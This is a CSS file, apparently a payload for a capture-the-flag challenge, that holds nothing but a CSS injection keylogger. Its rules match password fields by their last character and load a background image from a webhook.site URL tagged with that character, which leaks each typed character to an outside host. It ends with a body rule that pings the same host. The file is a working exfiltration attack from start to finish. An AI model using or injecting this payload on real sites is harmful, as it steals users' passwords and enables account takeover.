/* for whyctf */
input[type="password"][value$="a"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?a"); }
input[type="password"][value$="b"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?b"); }
input[type="password"][value$="c"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?c"); }
input[type="password"][value$="d"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?d"); }
input[type="password"][value$="e"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?e"); }
input[type="password"][value$="f"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?f"); }
input[type="password"][value$="g"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?g"); }
input[type="password"][value$="h"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?h"); }
input[type="password"][value$="i"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?i"); }
input[type="password"][value$="j"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?j"); }
input[type="password"][value$="k"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?k"); }
input[type="password"][value$="l"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?l"); }
input[type="password"][value$="m"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?m"); }
input[type="password"][value$="n"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?n"); }
input[type="password"][value$="o"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?o"); }
input[type="password"][value$="p"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?p"); }
input[type="password"][value$="q"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?q"); }
input[type="password"][value$="r"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?r"); }
input[type="password"][value$="s"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?s"); }
input[type="password"][value$="t"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?t"); }
input[type="password"][value$="u"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?u"); }
input[type="password"][value$="v"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?v"); }
input[type="password"][value$="w"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?w"); }
input[type="password"][value$="x"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?x"); }
input[type="password"][value$="y"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?y"); }
input[type="password"][value$="z"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?z"); }
input[type="password"][value$="A"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?A"); }
input[type="password"][value$="B"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?B"); }
input[type="password"][value$="C"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?C"); }
input[type="password"][value$="D"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?D"); }
input[type="password"][value$="E"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?E"); }
input[type="password"][value$="F"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?F"); }
input[type="password"][value$="G"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?G"); }
input[type="password"][value$="H"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?H"); }
input[type="password"][value$="I"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?I"); }
input[type="password"][value$="J"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?J"); }
input[type="password"][value$="K"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?K"); }
input[type="password"][value$="L"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?L"); }
input[type="password"][value$="M"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?M"); }
input[type="password"][value$="N"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?N"); }
input[type="password"][value$="O"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?O"); }
input[type="password"][value$="P"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?P"); }
input[type="password"][value$="Q"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?Q"); }
input[type="password"][value$="R"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?R"); }
input[type="password"][value$="S"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?S"); }
input[type="password"][value$="T"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?T"); }
input[type="password"][value$="U"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?U"); }
input[type="password"][value$="V"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?V"); }
input[type="password"][value$="W"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?W"); }
input[type="password"][value$="X"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?X"); }
input[type="password"][value$="Y"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?Y"); }
input[type="password"][value$="Z"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?Z"); }
input[type="password"][value$="0"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?0"); }
input[type="password"][value$="1"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?1"); }
input[type="password"][value$="2"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?2"); }
input[type="password"][value$="3"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?3"); }
input[type="password"][value$="4"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?4"); }
input[type="password"][value$="5"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?5"); }
input[type="password"][value$="6"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?6"); }
input[type="password"][value$="7"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?7"); }
input[type="password"][value$="8"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?8"); }
input[type="password"][value$="9"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?9"); }
input[type="password"][value$="_"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?_"); }
input[type="password"][value$="="] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?="); }
input[type="password"][value$="-"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?-"); }
input[type="password"][value$="@"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?@"); }
input[type="password"][value$="{"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?open"); }
input[type="password"][value$="}"] { background: url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?close"); }
body {color: red; background:url("https://webhook.site/9501285a-f6f3-45e0-b7f2-5f96f59ec4fa?ping");}